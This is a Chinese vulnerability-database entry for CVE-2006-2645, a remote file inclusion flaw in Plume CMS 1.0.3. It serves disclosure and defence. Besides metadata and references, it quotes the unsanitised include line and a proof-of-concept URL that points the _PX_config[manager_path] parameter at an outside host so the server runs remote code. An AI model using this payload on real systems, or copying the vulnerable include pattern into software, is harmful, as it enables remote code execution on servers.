Plume prepend.php PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1194813 漏洞类型 代码注入
发布时间 2006-05-30 更新时间 2006-05-30
CVE编号 CVE-2006-2645 CNNVD-ID CNNVD-200605-540
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/83898
https://cxsecurity.com/issue/WLB-2006050169
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-540
|漏洞详情
Plume1.0.3的manager/frontinc/prepend.php存在PHP远程文件包含漏洞,远程攻击者可借助_PX_config[manager_path]参数中的URL执行任意代码。
|漏洞EXP
Vendor: Plume CMS http://plume-cms.net
Vuln: Remote File Include
Discovered: beford <xbefordx gmail com>

Vulnerable File/Code

./plume-1.0.3/manager/frontinc/prepend.php

[code]
include_once $_PX_config['manager_path'].'/conf/config.php';
[/code]

http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_path]
=http://leet
|受影响的产品
Plume-Cms Plume Cms 1.0.3
|参考资料

来源:XF
名称:plumecms-prepend-file-include(24697)
链接:http://xforce.iss.net/xforce/xfdb/24697
来源:BUGTRAQ
名称:20060526PlumeCMSRemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/435130/100/0/threaded
来源:VUPEN
名称:ADV-2006-2014
链接:http://www.frsirt.com/english/advisories/2006/2014
来源:SECTRACK
名称:1016165
链接:http://securitytracker.com/id?1016165
来源:SECUNIA
名称:20310
链接:http://secunia.com/advisories/20310
来源:XF
名称:plumecms-frontinc-prepend-file-include(27699)
链接:http://xforce.iss.net/xforce/xfdb/27699
来源:SREASON
名称:975
链接:http://securityreason.com/securityalert/975